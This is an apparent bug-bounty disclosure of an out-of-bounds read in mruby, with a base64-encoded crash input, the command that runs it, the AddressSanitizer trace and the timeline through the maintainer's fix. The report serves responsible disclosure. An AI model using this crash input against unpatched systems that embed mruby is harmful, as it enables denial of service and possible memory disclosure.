Out-of-bounds Read in mruby/mruby


Reported on

Feb 8th 2022


commit 4e8ab145da52c3cfb0bd4b823df8041dcc52f454

Author: Yukihiro "Matz" Matsumoto matz@ruby.or.jp

Date: Tue Feb 8 13:03:51 2022 +0900

Proof of Concept

$ echo -ne "e30KWyoqMCxtOjBdBHM9MDYudGl0ZXN7My7+////c3slXSN7W11lYWsKYj17fQpbKiowLG06MF3/
AACA/wENXH9dXGM/ICphID0gKCkgYW1iZCVcX0JO//4AACA8ACpbAAB7KQ==" | base64 -d > poc
$ cat poc
\]\c? *a = () ambd%\_BN�� <*[{)#
$ ./bin/mruby ./poc
==1898947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x00000059dca6 bp 0x7ffd8e5ac2b0 sp 0x7ffd8e5ab390 T0)
==1898947==The signal is caused by a READ memory access.
==1898947==Hint: address points to the zero page.
    #0 0x59dca6 in mrb_check_frozen /root/fuzz/mruby/include/mruby.h:1418:7
    #1 0x59dca6 in hash_modify /root/fuzz/mruby/src/hash.c:1154:3
    #2 0x59dca6 in mrb_hash_set /root/fuzz/mruby/src/hash.c:1242:3
    #3 0x4e5273 in mrb_vm_exec /root/fuzz/mruby/src/vm.c:2771:9
    #4 0x4d77de in mrb_vm_run /root/fuzz/mruby/src/vm.c:1128:12
    #5 0x5e83a2 in mrb_load_exec /root/fuzz/mruby/mrbgems/mruby-compiler/core/parse.y:6883:7
    #6 0x5e9293 in mrb_load_detect_file_cxt /root/fuzz/mruby/mrbgems/mruby-compiler/core/parse.y:6926:12
    #7 0x4cb88b in main /root/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #8 0x7fb293420564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #9 0x41d7ad in _start (/root/fuzz/mruby/bin/mruby+0x41d7ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/fuzz/mruby/include/mruby.h:1418:7 in mrb_check_frozen


Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.


Thanks to alkyne Choi

We are processing your report and will contact the mruby team within 24 hours. 2 years ago
Pocas modified the report
2 years ago
Pocas modified the report
2 years ago
Pocas modified the report
2 years ago
Pocas modified the report
2 years ago
We have contacted a member of the mruby team and are waiting to hear back 2 years ago
2 years ago



We have sent a follow up to the mruby team. We will try again in 4 days. 2 years ago
Yukihiro "Matz" Matsumoto validated this vulnerability 2 years ago
p0cas has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed in 3.2 with commit ff3a5e 2 years ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty

Sorry for being late to check.

to join this conversation